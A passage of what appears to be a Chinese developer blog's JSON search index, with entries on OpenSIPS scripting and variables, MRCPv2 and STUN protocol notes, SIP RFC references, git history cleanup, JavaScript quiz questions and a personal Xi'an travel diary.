save(\u0026#34;location\u0026#34;); #单纯的字符串作为参数 从3.0开始,传参可以更加自然。\n整数可以直接传参,不用加双引号 do_something(1, 1); 输入或者输出的$var(), 不用加双引号,加了反而会报错 do_something($var(a), $var(b)); 格式化字符串,需要加双引号 do_something(1, \u0026#34;$var(bb)_$var(b)\u0026#34;); 参考 https://blog.opensips.org/2019/11/05/the-module-function-interface-rework-in-opensips-3-0/ https://www.opensips.org/Documentation/Script-Syntax-3-0# ","permalink":"https://wdd.js.org/opensips/3x/module-args/","summary":"写过opensips脚本的同学,往往对函数的传参感到困惑。\n例如:\nds_select_dst()可以接受整数或者值为正数的变量作为第一个参数,但是nat_uac_test()的第一个参数就只能是整数,而不能是变量 为什么rl_check()可以接受格式化的字符串,而save()只能接受字符串。 为什么ds_select_dst(\u0026quot;1\u0026quot;, \u0026quot;4\u0026quot;) 作为整数也要加上双引号? 为什么变量要加上双引号? ds_select_dst(\u0026quot;$var(aa)\u0026quot;, \u0026quot;4\u0026quot;) 为什么t_on_branch(\u0026quot;1\u0026quot;)路由的钩子要加上双引号? 为什么route(go_to_something);这里又不需要加上引号? ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;); $var(aa)=1; ds_select_dst(\u0026#34;$var(aa)\u0026#34;, \u0026#34;0\u0026#34;); rl_check(\u0026#34;gw_$ru\u0026#34;, \u0026#34;$var(limit)\u0026#34;); #格式化的gw_$ru save(\u0026#34;location\u0026#34;); #单纯的字符串作为参数 从3.0开始,传参可以更加自然。\n整数可以直接传参,不用加双引号 do_something(1, 1); 输入或者输出的$var(), 不用加双引号,加了反而会报错 do_something($var(a), $var(b)); 格式化字符串,需要加双引号 do_something(1, \u0026#34;$var(bb)_$var(b)\u0026#34;); 参考 https://blog.opensips.org/2019/11/05/the-module-function-interface-rework-in-opensips-3-0/ https://www.opensips.org/Documentation/Script-Syntax-3-0# ","title":"模块传参的重构"},{"content":" TelNYX.pdf OpenSIPS 2.3 mediasoup Cutting Edge WebRTC Video COnferencing FreeSWITCH-driven routing in OpenSIPS Voicenter: Contact center on Steroids Vlad_Paiu-Distributed_OpenSIPS_Systems_Cluecon14.pdf Vlad_Paiu-OpenSIPS_Summit_Austin_2015-Async.pdf Ionut_Ionita-OpenSIPS_Summit2017-Capturing_beyond_SIP FLAVIO_GONCALVES-Fraud_in_VoIP_Today.pdf Alexandr_Dubovikov-OpenSIPS_Summit2017-RTC_Threat_Intelligence_Exchange.pdf OpenSIPS_LoadBalancing.pdf Vlad_Paiu-OpenSIPS_Summit_2104-OpenSIPS_End_User_Services.pdf Razvan_Crainea-OpenSIPS_Summit2017-From_SIPI_Trunks_to_End_Users.pdf Razvan_Crainea-OpenSIPS_Summit-Scaling_Asterisk.pdf Vlad_Paiu-OpenSIPS_Summit-Service_Enabling_for_Asterisk.pdf Jonas_Borjesson-OpenSIPS_Summit_Austin_2015.pdf Michele_Pinasi-OpenSIPS_Summit2017-How_we_did_VoIP.pdf Bogdan_Iancu-OpenSIPS_Summit_Keynotes.pdf Giovanni_Maruzselli-OpenSIPS_Summit2017-Scaling_FreeSWITCHes.pdf Maksym_Sobolyev-OpenSIPS_Summit2017-Sippy_Labs_update.pdf docker-cluster.pdf voip malware attack tool .pdf Bogdan_Iancu-OpenSIPS_Summit-OpenSIPS_2_1.pdf Pete_Kelly-OpenSIPS_Workshop_Chicago_2015-Calling_Cards_B2BUA.pdf Bogdan_Iancu-OpenSIPS_Summit-keynotes.pdf Alex_Goulis-Opensips_CNAME.pdf OpenSIPS_2.0_Framework.pdf Norman_Brandinger-OpenSIPS_Summit_2014-Advanced_SIP_Routing_with_OpenSIPS_modules.pdf ","permalink":"https://wdd.js.org/opensips/pdf/","summary":" TelNYX.pdf OpenSIPS 2.3 mediasoup Cutting Edge WebRTC Video COnferencing FreeSWITCH-driven routing in OpenSIPS Voicenter: Contact center on Steroids Vlad_Paiu-Distributed_OpenSIPS_Systems_Cluecon14.pdf Vlad_Paiu-OpenSIPS_Summit_Austin_2015-Async.pdf Ionut_Ionita-OpenSIPS_Summit2017-Capturing_beyond_SIP FLAVIO_GONCALVES-Fraud_in_VoIP_Today.pdf Alexandr_Dubovikov-OpenSIPS_Summit2017-RTC_Threat_Intelligence_Exchange.pdf OpenSIPS_LoadBalancing.pdf Vlad_Paiu-OpenSIPS_Summit_2104-OpenSIPS_End_User_Services.pdf Razvan_Crainea-OpenSIPS_Summit2017-From_SIPI_Trunks_to_End_Users.pdf Razvan_Crainea-OpenSIPS_Summit-Scaling_Asterisk.pdf Vlad_Paiu-OpenSIPS_Summit-Service_Enabling_for_Asterisk.pdf Jonas_Borjesson-OpenSIPS_Summit_Austin_2015.pdf Michele_Pinasi-OpenSIPS_Summit2017-How_we_did_VoIP.pdf Bogdan_Iancu-OpenSIPS_Summit_Keynotes.pdf Giovanni_Maruzselli-OpenSIPS_Summit2017-Scaling_FreeSWITCHes.pdf Maksym_Sobolyev-OpenSIPS_Summit2017-Sippy_Labs_update.pdf docker-cluster.pdf voip malware attack tool .pdf Bogdan_Iancu-OpenSIPS_Summit-OpenSIPS_2_1.pdf Pete_Kelly-OpenSIPS_Workshop_Chicago_2015-Calling_Cards_B2BUA.pdf Bogdan_Iancu-OpenSIPS_Summit-keynotes.pdf Alex_Goulis-Opensips_CNAME.pdf OpenSIPS_2.0_Framework.pdf Norman_Brandinger-OpenSIPS_Summit_2014-Advanced_SIP_Routing_with_OpenSIPS_modules.pdf ","title":"Pdf学习资料"},{"content":"一年过半以后,偶然打开微信公众号,看到草稿箱里的篇文章。我才回想起去年带女友去西安的那个遥远的夏天。\n如今女友已经变成老婆,这篇文章我才想起来发表。\nday 1 钟楼 鼓楼 回民街 那是六月末的时候,和女友一起坐火车去了趟西安。\n为什么要去西安呢?据吃货女友说,西安有非常多的好吃的。所以人生是必须要去一趟的。\n清晨,我们从南京南站出发坐动车,一路向西,坐了5个多小时,到达西安北站。\n路上我带了一个1500ml的水瓶,以及1500ml的酸奶。\n女友吐槽说,还好没做飞机,不然我就像宝强一样,要在机场干完一大瓶酸奶了。\n下了动车,立即前往钟楼订的宾馆,放置行李。\n西安钟楼位于西安市中心,是中国现存钟楼中形制最大、保存最完整的一座。建于明太祖洪武十七年,初建于今广济街口,与鼓楼相对,明神宗万历十年整体迁移于今址。\n沿着钟楼附近,我们逛了一圈回民街。\n回民街是西安著名的美食文化街区,是西安小吃街区。\n西安回民街作为西安风情的代表之一,是回民街区多条街道的统称,由北广济街、北院门、西羊市、大皮院、化觉巷、洒金桥等数条街道组成,在钟鼓楼后。\n钟楼\nday 2 大唐芙蓉城 大唐不夜城 大雁塔 大唐芙蓉城是一座仿唐建筑,里面有许多景点,或许我们不应该早上来,因为上午太热了。\n唯一庆幸的是,我们带了一个很大的水杯,而且芙蓉城里提供免费的开水,所以我们才没有被渴死。\n大唐芙蓉城 西游师徒四人 雕塑\n傍晚的 大唐不夜城\n夜幕降临的 大唐不夜城\n遗憾之一:大雁塔没有去看,因为当时正在维修,周围全是脚手架。 遗憾之二:没有到陕西历史博物馆看看,因为没有早点预约\n女友埋怨我说我不早点做攻略,害得这么多景点去不了。\n我说我是做了攻略的,还记在备忘录里面呢。\n女友打开我的备忘录一看,笑出眼泪说:你做的啥狗屁攻略,就这几个字!男人果然靠不住!\n我说: 这你就不懂了吧,啥都写清楚,一个一个点打卡多没意思。\nday3 华清宫 兵马俑 长恨歌 由于西安攻略做的太过肤浅,所以第二天晚上决定直接跟团。在网上买了两张华清宫兵马俑和长恨歌的一日游。\n说实在的,华清宫没啥意思,都是洗澡池子。\n蒋介石洗过澡的池子,杨贵妃的洗澡池子,唐明皇的洗澡池子,大臣们的洗澡池子。\n逛完之后,下午我们坐着旅游大巴,前往兵马俑。\n一号坑\n一号坑\n一号坑\n一号坑\n一号坑\n兵马俑有三个坑。\n一号坑最大,兵马俑也是最多的。然而当时游客比肩接踵,加上天气炎热,大家都在里面像蒸桑拿一样。\n出了一号坑,我心里想:这么大个坑,这么热为啥不装空调,难道是因为要保护文物吗?\n后来据博物馆的讲解员介绍:不装空调是因为审核手续复杂,可能要要个几十年手续才能完成。像二号坑和三号坑都已经装好空调了。\n二号坑真的是个坑,没有兵马俑,仅仅是个大坑。\n三号坑比较小,仅有几个陶俑。\n长恨歌实际上是一个大型的室外表演,由白居易的《长恨歌》演绎而来,讲述唐明皇和杨贵妃的爱恨情长。灯光绚丽,舞蹈优美,感人至深。\n关于西安美食就很多了\n毛笔酥\n六大碗\n毛笔酥 酸梅汤\n","permalink":"https://wdd.js.org/posts/2022/12/xian-travel/","summary":"一年过半以后,偶然打开微信公众号,看到草稿箱里的篇文章。我才回想起去年带女友去西安的那个遥远的夏天。\n如今女友已经变成老婆,这篇文章我才想起来发表。\nday 1 钟楼 鼓楼 回民街 那是六月末的时候,和女友一起坐火车去了趟西安。\n为什么要去西安呢?据吃货女友说,西安有非常多的好吃的。所以人生是必须要去一趟的。\n清晨,我们从南京南站出发坐动车,一路向西,坐了5个多小时,到达西安北站。\n路上我带了一个1500ml的水瓶,以及1500ml的酸奶。\n女友吐槽说,还好没做飞机,不然我就像宝强一样,要在机场干完一大瓶酸奶了。\n下了动车,立即前往钟楼订的宾馆,放置行李。\n西安钟楼位于西安市中心,是中国现存钟楼中形制最大、保存最完整的一座。建于明太祖洪武十七年,初建于今广济街口,与鼓楼相对,明神宗万历十年整体迁移于今址。\n沿着钟楼附近,我们逛了一圈回民街。\n回民街是西安著名的美食文化街区,是西安小吃街区。\n西安回民街作为西安风情的代表之一,是回民街区多条街道的统称,由北广济街、北院门、西羊市、大皮院、化觉巷、洒金桥等数条街道组成,在钟鼓楼后。\n钟楼\nday 2 大唐芙蓉城 大唐不夜城 大雁塔 大唐芙蓉城是一座仿唐建筑,里面有许多景点,或许我们不应该早上来,因为上午太热了。\n唯一庆幸的是,我们带了一个很大的水杯,而且芙蓉城里提供免费的开水,所以我们才没有被渴死。\n大唐芙蓉城 西游师徒四人 雕塑\n傍晚的 大唐不夜城\n夜幕降临的 大唐不夜城\n遗憾之一:大雁塔没有去看,因为当时正在维修,周围全是脚手架。 遗憾之二:没有到陕西历史博物馆看看,因为没有早点预约\n女友埋怨我说我不早点做攻略,害得这么多景点去不了。\n我说我是做了攻略的,还记在备忘录里面呢。\n女友打开我的备忘录一看,笑出眼泪说:你做的啥狗屁攻略,就这几个字!男人果然靠不住!\n我说: 这你就不懂了吧,啥都写清楚,一个一个点打卡多没意思。\nday3 华清宫 兵马俑 长恨歌 由于西安攻略做的太过肤浅,所以第二天晚上决定直接跟团。在网上买了两张华清宫兵马俑和长恨歌的一日游。\n说实在的,华清宫没啥意思,都是洗澡池子。\n蒋介石洗过澡的池子,杨贵妃的洗澡池子,唐明皇的洗澡池子,大臣们的洗澡池子。\n逛完之后,下午我们坐着旅游大巴,前往兵马俑。\n一号坑\n一号坑\n一号坑\n一号坑\n一号坑\n兵马俑有三个坑。\n一号坑最大,兵马俑也是最多的。然而当时游客比肩接踵,加上天气炎热,大家都在里面像蒸桑拿一样。\n出了一号坑,我心里想:这么大个坑,这么热为啥不装空调,难道是因为要保护文物吗?\n后来据博物馆的讲解员介绍:不装空调是因为审核手续复杂,可能要要个几十年手续才能完成。像二号坑和三号坑都已经装好空调了。\n二号坑真的是个坑,没有兵马俑,仅仅是个大坑。\n三号坑比较小,仅有几个陶俑。\n长恨歌实际上是一个大型的室外表演,由白居易的《长恨歌》演绎而来,讲述唐明皇和杨贵妃的爱恨情长。灯光绚丽,舞蹈优美,感人至深。\n关于西安美食就很多了\n毛笔酥\n六大碗\n毛笔酥 酸梅汤","title":"西安之旅 不仅有羊肉泡馍 也有长恨歌"},{"content":"简介 MRCPv2 是Media Resource Control Protocol Version 2的缩写 MRCP 允许客户端去操作服务端的媒体资源处理 MRCP 的常见功能如下 文本转语音 语音识别 说话人识别 语音认证 等等 MRCP 并不是一个独立的协议,而是依赖于其他的协议,如 SIP/SDP MRCPv2 RFC 发表于 2012 年 MRCPv2 主要由思科,Nuance,Speechworks 开发 MRCPv2 是基于 MRCPv1 开发的 MRCPv2 不兼容 MRCPv1 MRCPv2 在传输层使用 TCP 或者 TLS 定义 媒体资源: An entity on the speech processing server that can be controlled through MRCPv2. MRCP 服务器: Aggregate of one or more \u0026ldquo;Media Resource\u0026rdquo; entities on a server, exposed through MRCPv2. Often, \u0026lsquo;server\u0026rsquo; in this document refers to an MRCP server. MRCP 客户端: An entity controlling one or more Media Resources through MRCPv2 (\u0026ldquo;Client\u0026rdquo; for short). DTMF: Dual-Tone Multi-Frequency; a method of transmitting key presses in-band, either as actual tones (Q.23 [Q.23]) or as named tone events (RFC 4733 [RFC4733]). Endpointing: The process of automatically detecting the beginning and end of speech in an audio stream. This is critical both for speech recognition and for automated recording as one would find in voice mail systems. Hotword Mode: A mode of speech recognition where a stream of utterances is evaluated for match against a small set of command words. This is generally employed either to trigger some action or to control the subsequent grammar to be used for further recognition. 架构 客户端使用SIP/SDP建立MRCP控制通道 SIP使用SDP的offer/answer模型来描述MRCP通道的参数 服务端在answer SDP中提供唯一的通道ID和服务端TCP端口号 客户端可以开启一个新的TCP链接,多个MRCP通道也可以共享一个TCP链接 管理资源控制通道 This \u0026ldquo;m=\u0026rdquo; line MUST have a media type field of \u0026ldquo;application\u0026rdquo; transport type field of either \u0026ldquo;TCP/MRCPv2\u0026rdquo; or \u0026ldquo;TCP/TLS/MRCPv2\u0026rdquo; The port number field of the \u0026ldquo;m=\u0026rdquo; line MUST contain the \u0026ldquo;discard\u0026rdquo; port of the transport protocol (port 9 for TCP) in the SDP offer from the client MUST contain the TCP listen port on the server in the SDP answer MRCPv2 servers MUST NOT assume any relationship between resources using the same port other than the sharing of the communication channel. To remain backwards compatible with conventional SDP usage, the format field of the \u0026ldquo;m=\u0026rdquo; line MUST have the arbitrarily selected value of \u0026ldquo;1\u0026rdquo;. The a=connection attribute MUST have a value of \u0026ldquo;new\u0026rdquo; on the very first control \u0026ldquo;m=\u0026rdquo; line offer from the client to an MRCPv2 server Subsequent control \u0026ldquo;m=\u0026rdquo; line offers from the client to the MRCP server MAY contain \u0026ldquo;new\u0026rdquo; or \u0026ldquo;existing\u0026rdquo;, depending on whether the client wants to set up a new connection or share an existing connection When the client wants to deallocate the resource from this session, it issues a new SDP offer, according to RFC 3264 [RFC3264], where the control \u0026ldquo;m=\u0026rdquo; line port MUST be set to 0 When the client wants to tear down the whole session and all its resources, it MUST issue a SIP BYE request to close the SIP session. This will deallocate all the control channels and resources allocated under the session. MRCPv2 Session Termination If an MRCP client notices that the underlying connection has been closed for one of its MRCP channels, and it has not previously initiated a re-INVITE to close that channel, it MUST send a BYE to close down the SIP dialog and all other MRCP channels. If an MRCP server notices that the underlying connection has been closed for one of its MRCP channels, and it has not previously received and accepted a re-INVITE closing that channel, then it MUST send a BYE to close down the SIP dialog and all other MRCP channels.\nMRCP request request-line = mrcp-version SP message-length SP method-name SP request-id CRLF request-id = 1*10DIGIT MRCP response response-line = mrcp-version SP message-length SP request-id SP status-code SP request-state CRLF status-code = 3DIGIT request-state = \u0026ldquo;COMPLETE\u0026rdquo; / \u0026ldquo;IN-PROGRESS\u0026rdquo; / \u0026ldquo;PENDING\u0026rdquo; event event-line = mrcp-version SP message-length SP event-name SP request-id SP request-state CRLF event-name = synthesizer-event / recognizer-event / recorder-event / verifier-event 参考 https://www.rfc-editor.org/rfc/rfc6787 ","permalink":"https://wdd.js.org/posts/2022/12/mrcp-notes/","summary":"简介 MRCPv2 是Media Resource Control Protocol Version 2的缩写 MRCP 允许客户端去操作服务端的媒体资源处理 MRCP 的常见功能如下 文本转语音 语音识别 说话人识别 语音认证 等等 MRCP 并不是一个独立的协议,而是依赖于其他的协议,如 SIP/SDP MRCPv2 RFC 发表于 2012 年 MRCPv2 主要由思科,Nuance,Speechworks 开发 MRCPv2 是基于 MRCPv1 开发的 MRCPv2 不兼容 MRCPv1 MRCPv2 在传输层使用 TCP 或者 TLS 定义 媒体资源: An entity on the speech processing server that can be controlled through MRCPv2. MRCP 服务器: Aggregate of one or more \u0026ldquo;Media Resource\u0026rdquo; entities on a server, exposed through MRCPv2.","title":"MRCPv2 协议学习"},{"content":"有些时候,git 仓库累积了太多无用的历史更改,导致 clone 文件过大。如果确定历史更改没有意义,可以采用下述方法清空历史,\n先 clone 项目到本地目录 (以名为 mylearning 的仓库为例) git clone git@gitee.com:badboycoming/mylearning.git 进入 mylearning 仓库,拉一个分支,比如名为 latest_branch git checkout --orphan latest_branch 添加所有文件到上述分支 (Optional) git add -A 提交一次 git commit -am \u0026#34;Initial commit.\u0026#34; 删除 master 分支 git branch -D master 更改当前分支为 master 分支 git branch -m master 将本地所有更改 push 到远程仓库 git push -f origin master 关联本地 master 到远程 master git branch --set-upstream-to=origin/master ","permalink":"https://wdd.js.org/git/clean-all-history/","summary":"有些时候,git 仓库累积了太多无用的历史更改,导致 clone 文件过大。如果确定历史更改没有意义,可以采用下述方法清空历史,\n先 clone 项目到本地目录 (以名为 mylearning 的仓库为例) git clone git@gitee.com:badboycoming/mylearning.git 进入 mylearning 仓库,拉一个分支,比如名为 latest_branch git checkout --orphan latest_branch 添加所有文件到上述分支 (Optional) git add -A 提交一次 git commit -am \u0026#34;Initial commit.\u0026#34; 删除 master 分支 git branch -D master 更改当前分支为 master 分支 git branch -m master 将本地所有更改 push 到远程仓库 git push -f origin master 关联本地 master 到远程 master git branch --set-upstream-to=origin/master ","title":"清除所有GIT历史记录"},{"content":"git remote set-url origin repo-url ","permalink":"https://wdd.js.org/git/remote-url/","summary":"git remote set-url origin repo-url ","title":"GIT 重新设置远程url"},{"content":"1. 分析输出 for (var i = 0; i \u0026lt; 3; i++) { setTimeout(() =\u0026gt; console.log(i), 1) } for (let i = 0; i \u0026lt; 3; i++) { setTimeout(() =\u0026gt; console.log(i), 1) } 2. 分析输出 const shape = { radius: 10, diameter() { return this.radius * 2 }, perimeter: () =\u0026gt; 2 * Math.PI * this.radius, } shape.diameter() shape.perimeter() 3. 分析输出 const a = {} function test1(a) { a = { name: \u0026#39;wdd\u0026#39;, } } function test2() { test1(a) } function test3() { console.log(a) } test2() test3() 4. 分析输出 class Chameleon { static colorChange(newColor) { this.newColor = newColor return this.newColor } constructor({ newColor = \u0026#39;green\u0026#39; } = {}) { this.newColor = newColor } } const freddie = new Chameleon({ newColor: \u0026#39;purple\u0026#39; }) freddie.colorChange(\u0026#39;orange\u0026#39;) 5. 分析输出 function Person(firstName, lastName) { this.firstName = firstName this.lastName = lastName } const member = new Person(\u0026#39;Lydia\u0026#39;, \u0026#39;Hallie\u0026#39;) Person.getFullName = function () { return `${this.firstName} ${this.lastName}` } console.log(member.getFullName()) 6. 事件传播的三个阶段是什么? A: Target \u0026gt; Capturing \u0026gt; Bubbling B: Bubbling \u0026gt; Target \u0026gt; Capturing C: Target \u0026gt; Bubbling \u0026gt; Capturing D: Capturing \u0026gt; Target \u0026gt; Bubbling 7. 所有对象都有原型 A: 对 B: 错\n8. 输出? function sum(a, b) { return a + b } sum(1, \u0026#39;2\u0026#39;) 9. 输出? function getPersonInfo(one, two, three) { console.log(one) console.log(two) console.log(three) } const person = \u0026#39;Lydia\u0026#39; const age = 21 getPersonInfo`${person} is ${age} years old` 输出? function checkAge(data) { if (data === { age: 18 }) { console.log(\u0026#39;You are an adult!\u0026#39;) } else if (data == { age: 18 }) { console.log(\u0026#39;You are still an adult.\u0026#39;) } else { console.log(`Hmm.. You don\u0026#39;t have an age I guess`) } } checkAge({ age: 18 }) 输出? function getAge(...args) { console.log(typeof args) } getAge(21) ","permalink":"https://wdd.js.org/fe/js-questions/","summary":"1. 分析输出 for (var i = 0; i \u0026lt; 3; i++) { setTimeout(() =\u0026gt; console.log(i), 1) } for (let i = 0; i \u0026lt; 3; i++) { setTimeout(() =\u0026gt; console.log(i), 1) } 2. 分析输出 const shape = { radius: 10, diameter() { return this.radius * 2 }, perimeter: () =\u0026gt; 2 * Math.PI * this.radius, } shape.diameter() shape.perimeter() 3. 分析输出 const a = {} function test1(a) { a = { name: \u0026#39;wdd\u0026#39;, } } function test2() { test1(a) } function test3() { console.","title":"JS 考题"},{"content":"想查资料,发现 deepin 居然没有 man 这个命令。\n安装 sudo apt-get install man-db 使用介绍 ","permalink":"https://wdd.js.org/posts/2022/11/deepin-install-man/","summary":"想查资料,发现 deepin 居然没有 man 这个命令。\n安装 sudo apt-get install man-db 使用介绍 ","title":"Deepin安装man命令"},{"content":"脚本变量 avp 变量 伪变量 SIP 头, $(hrd(name)) $(hdr(name)[N]) - represents the body of the N-th header identified by \u0026rsquo;name\u0026rsquo;. If [N] is omitted then the body of the first header is printed. The first header is got when N=0, for the second N=1, a.s.o. To print the last header of that type, use -1, no other negative values are supported now. No white spaces are allowed inside the specifier (before }, before or after {, [, ] symbols). When N=\u0026rsquo;*\u0026rsquo;, all headers of that type are printed.\nThe module should identify most of compact header names (the ones recognized by OpenSIPS which should be all at this moment), if not, the compact form has to be specified explicitly. It is recommended to use dedicated specifiers for headers (e.g., %ua for user agent header), if they are available \u0026ndash; they are faster.\n$(hdrcnt(name)) \u0026ndash; returns number of headers of type given by \u0026rsquo;name\u0026rsquo;. Uses same rules for specifying header names as $hdr(name) above. Many headers (e.g., Via, Path, Record-Route) may appear more than once in the message. This variable returns the number of headers of a given type.\nNote that some headers (e.g., Path) may be joined together with commas and appear as a single header line. This variable counts the number of header lines, not header values.\nFor message fragment below, $hdrcnt(Path) will have value 2 and $(hdr(Path)[0]) will have value \u0026lt;a.com\u0026gt;:\nPath: \u0026lt;a.com\u0026gt; Path: \u0026lt;b.com\u0026gt; For message fragment below, $hdrcnt(Path) will have value 1 and $(hdr(Path)[0]) will have value \u0026lt;a.com\u0026gt;,\u0026lt;b.com\u0026gt;:\nPath: \u0026lt;a.com\u0026gt;,\u0026lt;b.com\u0026gt; Note that both examples above are semantically equivalent but the variables take on different values.\n","permalink":"https://wdd.js.org/2.4.x-docs/core-vars/","summary":"脚本变量 avp 变量 伪变量 SIP 头, $(hrd(name)) $(hdr(name)[N]) - represents the body of the N-th header identified by \u0026rsquo;name\u0026rsquo;. If [N] is omitted then the body of the first header is printed. The first header is got when N=0, for the second N=1, a.s.o. To print the last header of that type, use -1, no other negative values are supported now. No white spaces are allowed inside the specifier (before }, before or after {, [, ] symbols).","title":"核心变量"},{"content":" RFC 名称 https://tools.ietf.org/html/rfc3261 SIP: Session Initiation Protocol https://tools.ietf.org/html/rfc3665 Session Initiation Protocol (SIP) Basic Call Flow Examples https://tools.ietf.org/html/rfc6141 Re-INVITE and Target-Refresh Request Handling in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc4566 SDP: Session Description Protocol https://tools.ietf.org/html/rfc4028 Session Timers in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc1889 RTP: A Transport Protocol for Real-Time Applications https://tools.ietf.org/html/rfc2326 Real Time Streaming Protocol (RTSP) https://tools.ietf.org/html/rfc2327 SDP: Session Description Protocol https://tools.ietf.org/html/rfc3015 Megaco Protocol Version 1.0 https://tools.ietf.org/html/rfc1918 Address Allocation for Private Internets https://tools.ietf.org/html/rfc2663 IP Network Address Translator (NAT) Terminology and Considerations https://tools.ietf.org/html/rfc3605 Real Time Control Protocol (RTCP) attribute in Session Description Protocol (SDP) https://tools.ietf.org/html/rfc3711 The Secure Real-time Transport Protocol (SRTP) https://tools.ietf.org/html/rfc4568 Session Description Protocol (SDP) Security Descriptions for Media Streams https://tools.ietf.org/html/rfc4585 Extended RTP Profile for Real-time Transport Control Protocol (RTCP)-Based Feedback (RTP/AVPF) https://tools.ietf.org/html/rfc5124 Extended Secure RTP Profile for Real-time Transport Control Protocol (RTCP)-Based Feedback (RTP/SAVPF) https://tools.ietf.org/html/rfc5245 Interactive Connectivity Establishment (ICE): A Protocol for Network Address Translator (NAT) Traversal for Offer/Answer Protocols https://tools.ietf.org/html/rfc5626 Managing Client-Initiated Connections in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc5761 Multiplexing RTP Data and Control Packets on a Single Port https://tools.ietf.org/html/rfc5764 Datagram Transport Layer Security (DTLS) Extension to Establish Keys for the Secure Real-time Transport Protocol (SRTP) ","permalink":"https://wdd.js.org/opensips/ch1/sip-rfcs/","summary":"RFC 名称 https://tools.ietf.org/html/rfc3261 SIP: Session Initiation Protocol https://tools.ietf.org/html/rfc3665 Session Initiation Protocol (SIP) Basic Call Flow Examples https://tools.ietf.org/html/rfc6141 Re-INVITE and Target-Refresh Request Handling in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc4566 SDP: Session Description Protocol https://tools.ietf.org/html/rfc4028 Session Timers in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc1889 RTP: A Transport Protocol for Real-Time Applications https://tools.ietf.org/html/rfc2326 Real Time Streaming Protocol (RTSP) https://tools.ietf.org/html/rfc2327 SDP: Session Description Protocol https://tools.ietf.org/html/rfc3015 Megaco Protocol Version 1.0 https://tools.ietf.org/html/rfc1918 Address Allocation for Private Internets https://tools.","title":"SIP相关RFC协议"},{"content":" title: \u0026ldquo;STUN协议笔记\u0026rdquo; date: \u0026ldquo;2022-01-06 17:54:10\u0026rdquo; draft: false STUN是Simple Traversal of User Datagram Protocol (UDP) through Network Address Translators (NAT’s)的缩写 传输层底层用的是UDP 主要用来NAT穿透 主要用来解决voip领域的单方向通话(one-way)的问题 目的是让NAT后面的设备能发现自己的公网IP以及NAT的类型 让外部设备能够找到合适的端口和内部设备通信 刷新NAT绑定,类似keep-alive机制。否则端口映射可能因为超时被释放 STUN是cs架构的协议 客户端端192.168.1.3,使用5060端口,发送stun请求到 64.25.58.65, 经过了192.168.1.1的网关之后 网关将源ip改为212.128.56.125, 端口改为15050 stun服务器将请求发送到 网关的外网端口15050,然后网关将请求转发给192.168.1.3:5060 stun message type which typically is one of the below: - 0x0001 : Binding Request - 0x0101 : Binding Response\n0x0111 : Binding Error Response 0x0002 : Shared Secret Request 0x0102 : Shared Secret Response 0x0112 : Shared Secret Error Response **0x0001: MAPPED-ADDRESS - **This attribute contains an IP address and port. It is always placed in the Binding Response, and it indicates the source IP address and port the server saw in the Binding Request sent from the client, i.e.; the STUN client’s public IP address and port where it can be reached from the internet.\n0x0002: RESPONSE-ADDRESS - This attribute contains an IP address and port and is an optional attribute, typically in the Binding Request (sent from the STUN client to the STUN server). It indicates where the Binding Response (sent from the STUN server to the STUN client) is to be sent. If this attribute is not present in the Binding Request, the Binding Response is sent to the source IP address and port of the Binding Request which is attribute 0x0001: MAPPED-ADDRESS.\n0x0003: CHANGE-REQUEST - This attribute, which is only allowed in the Binding Request and optional, contains two flags; to control the IP address and port used to send the response. These flags are called \u0026ldquo;change IP\u0026rdquo; and \u0026ldquo;change Port\u0026rdquo; flags. The \u0026ldquo;change IP\u0026rdquo; and \u0026ldquo;change Port\u0026rdquo; flags are useful for determining whether the client is behind a restricted cone NAT or restricted port cone NAT. They instruct the server to send the Binding Responses from a different source IP address and port.\n**0x0004: SOURCE-ADDRESS - **This attribute is usually present in Binding Responses; it indicates the source IP address and port where the response was sent from, i.e. the IP address of the machine the client is running on (typically an internal private IP address). It is very useful as from this attribute the STUN server can detect twice NAT configurations.\n**0x0005: CHANGED-ADDRESS - **This attribute is usually present in Binding Responses; it informs the client of the source IP address and port that would be used if the client requested the \u0026ldquo;change IP\u0026rdquo; and \u0026ldquo;change port\u0026rdquo; behaviour.\n0x0006: USERNAME - This attribute is optional and is present in a Shared Secret Response with the PASSWORD attribute. It serves as a means to identify the shared secret used in the message integrity check.\n0x0007: PASSWORD - This attribute is optional and only present in Shared Secret Response along with the USERNAME attribute. The value of the PASSWORD attribute is of variable length and used as a shared secret between the STUN server and the STUN client.\n0x0008: MESSAGE-INTEGRITY - This attribute must be the last attribute in a STUN message and can be present in both Binding Request and Binding Response. It contains HMAC-SHA1 of the STUN message.\n**0x0009: ERROR-CODE - **This attribute is present in the Binding Error Response and Shared Secret Error Response only. It indicates that an error has occurred and indicates also the type of error which has occurred. It contains a numerical value in the range of 100 to 699; which is the error code and also a textual reason phrase encoded in UTF-8 describing the error code, which is meant for the client.\n0x000a: UNKNOWN-ATTRIBUTES - This attribute is present in the Binding Error Response or Shared Secret Error response when the error code is 420; some attributes sent from the client in the Request are unknown and the server does not understand them.\n0x000b: REFLECTED-FROM - This attribute is present only in Binding Response and its use is to provide traceability so the STUN server cannot be used as part of a denial of service attack. It contains the IP address of the source from where the request came from, i.e. the IP address of the STUN client.\nCommon STUN Server error codes Like many other protocols, the STUN protocol has a list of error codes. STUN protocol error codes are similar to those of HTTP or SIP. Below is a list of most common error codes encountered when using the STUN protocol. For a complete list of STUN protocol error codes refer to the STUN RFC 3489.\nError Code 400 - Bad request; the request was malformed. Client must modify request and try sending it again. Error Code 420 - Unknown attribute; the server did not understand an attribute in the request. Error Code 430 - Stale credentials; the shared secret sent in the request is expired; the client should obtain a new shared secret. Error Code 432 - Missing username; the username attribute is not present in the request. Error Code 500 - Server error; temporary error and the client should try to send the request again. 下图是一个webrtc呼叫的抓包,可以看到,在呼叫建立前的阶段。服务端和客户端都相互发送了Binding Request和响应了Bind Response。\n并且在通话过程中,还会有持续的binding reqeust, 并且在某些时候,源端口可能会变。说明媒体发送的端口也已经发生了改变。\n如果binding request 请求没有响应,那么语音很可以也会断,从而导致了呼叫挂断。\n参考 https://www.3cx.com/blog/voip-howto/stun/ https://www.3cx.com/blog/voip-howto/stun-voip-1/ https://www.3cx.com/blog/voip-howto/stun-protocol/ https://www.3cx.com/blog/voip-howto/stun-details/ ","permalink":"https://wdd.js.org/opensips/ch1/stun-notes/","summary":"title: 